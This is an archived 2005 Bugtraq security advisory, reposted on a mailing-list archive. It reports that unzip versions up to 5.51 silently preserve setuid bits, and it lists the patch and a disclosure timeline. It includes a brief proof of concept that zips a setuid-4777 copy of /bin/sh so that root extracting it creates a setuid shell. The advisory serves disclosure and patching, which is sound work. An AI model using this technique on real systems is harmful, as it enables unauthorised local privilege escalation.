Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: 7a69Adv#22 - UNIX unzip keep setuid and setgid files

7a69Adv#22 - UNIX unzip keep setuid and setgid files

From: Albert Puigsech Galicia <ripe_at_7a69ezine.org>
Date: Mon, 28 Feb 2005 13:17:02 +0000

- ------------------------------------------------------------------
       7a69ezine Advisories 7a69Adv#22
- ------------------------------------------------------------------
  http://www.7a69ezine.org [26/01/2005]
- ------------------------------------------------------------------

Title: Unzip keep setuid and setgid files

Author: Albert Puigsech Galicia - <ripe_at_7a69ezine.org>

Software: Unzip

Versions: >= 5.51

Remote: No

Exploit: yes

Severity: Low/Medium

- ------------------------------------------------------------------

I. Introduction.

 UnZip is an extraction utility for archives compressed in .zip format. It's
compatible with PKWARE's PKZIP and PKUNZIP utilities for MS-DOS. The primary
objectives have been portability and non-MSDOS fuctionality. More info about
unzip on http://www.info-zip.org/pub/infozip/UnZip.html.

II. Description.

 The unzip UNIX functionality allow you to maintain file permisions into
compressed files, and of course that includes the setuid bit. Because it does
not show a warning message before unpacking a setuid file is posible to create
a malicious ZIP file that creates an executable setuid.

III. Exploit

 It's realy easy to test this vulnerability. You can create a malicious ZIP
file following this example:

 $ cp /bin/sh .
 $ chmod 4777 sh
 $ zip malicious.zip sh

 When another user (including root) unpacks the file, a setuid shell file will
be created without any warning, as you can see here:

 # id
 # unzip malicious.zip
 Archive: malicious.zip
  inflating: sh
 # ls -l sh
 -rwsrwxrwx 1 root root 705148 Jan 16 17:04 sh

 Of course ye need a local account on the system to execute the file, so it's
not a remote vulnerability.

IV. Patch

        Upgrade to unzip 5.52.
 

V. Timeline

12/01/2005 - Bug discovered
16/01/2005 - Vendor contacted
21/01/2005 - Vendor response
25/01/2005 - Vendor patch provided
28/02/2005 - New versión published
28/02/2005 - Advisor published

VI. Extra data

 You can find more 7a69ezine advisories on this following link:

    http://www.7a69ezine.org/avisos/propios [spanish info]
Received on Mar 01 2005

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos